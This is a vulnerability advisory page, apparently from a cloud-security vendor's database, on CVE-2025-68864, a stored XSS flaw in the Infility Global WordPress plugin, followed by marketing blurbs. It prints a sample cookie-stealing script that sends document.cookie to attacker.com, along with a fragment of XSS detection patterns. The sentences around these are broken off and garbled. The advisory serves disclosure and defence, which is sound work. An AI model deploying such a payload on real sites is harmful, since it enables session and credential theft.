
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-68864 is a Stored Cross-Site Scripting (XSS) vulnerability in the Infility Global WordPress plugin, classified under CWE-79. It affects all versions of the Infility Global plugin up to and including 2.15.22 (with the affected version boundary updated multiple times by Patchstack, most recently reflecting ≤ 2.15.22). The vulnerability was reported on October 14, 2025, by researcher mcdruid and published by Patchstack on January 15–22, 2026. It carries a CVSS v3.1 base score of 7.1 (High), assigned by Patchstack (Patchstack, NVD).
The vulnerability is rooted in improper neutralization of user-supplied input during web page generation (CWE-79), allowing an attacker to inject and persistently store malicious scripts within the plugin's output. As a Stored XSS, the payload is saved server-side and executed in the browsers of users who subsequently visit the affected page, without requiring the attacker to have any authenticated privilege (unauthenticated exploitation is possible). Successful exploitation requires user interaction — a privileged user must visit or interact with the page containing the injected payload. No detailed technical write-up or public PoC code has been identified beyond the Patchstack advisory (Patchstack, NVD).
Successful exploitation allows an attacker to inject persistent malicious JavaScript into WordPress pages served by the Infility Global plugin, which executes in the context of any user's browser visiting the affected content. This can result in session hijacking, credential theft, unauthorized actions performed on behalf of authenticated users (including administrators), defacement, or redirection to malicious sites. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the vulnerable component itself, potentially affecting the broader WordPress site and its visitors (Patchstack).
No public exploit code or active in-the-wild exploitation has been confirmed for CVE-2025-68864. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting WordPress plugins at scale, regardless of site popularity, and has issued a virtual patch/mitigation rule for its subscribers (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.%3Cscript%3E, <script>, onerror=, onload=).<script> tags or JavaScript event handlers.As of the latest available information, no official patch from the plugin developer has been released — the Patchstack advisory notes "No official patch available" for versions ≤ 2.15.22. Site administrators should consider deactivating and removing the Infility Global plugin until a patched version is available. Patchstack subscribers benefit from a virtual patch/mitigation rule that blocks exploitation attempts. Additionally, implementing a Web Application Firewall (WAF) with XSS filtering rules and monitoring plugin input fields for script injection are recommended interim measures (Patchstack).
Wordfence referenced this vulnerability in their weekly WordPress vulnerability report for the week of January 12–18, 2026, indicating it was tracked by the broader WordPress security community. No significant vendor statements, researcher commentary beyond the Patchstack disclosure, or notable media coverage have been identified for this CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."